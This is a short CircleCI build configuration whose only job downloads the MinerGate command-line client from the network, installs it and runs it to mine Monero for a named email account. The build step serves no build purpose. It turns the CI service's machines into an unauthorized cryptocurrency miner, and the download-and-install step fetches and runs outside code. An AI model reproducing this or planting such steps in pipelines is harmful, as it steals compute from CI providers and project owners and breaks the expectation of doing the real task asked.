version: 2
jobs:
  build:
    docker:
      - image: debian:stretch
    steps:
      - checkout
      - run:
          command: |
            sudo apt update
            sudo apt install libpcre16-3 wget
            wget https://minergate.com/download/ubuntu-cli
            sudo dpkg -i ubuntu-cli
            minergate-cli --user yoginth@outlook.in --xmr 8
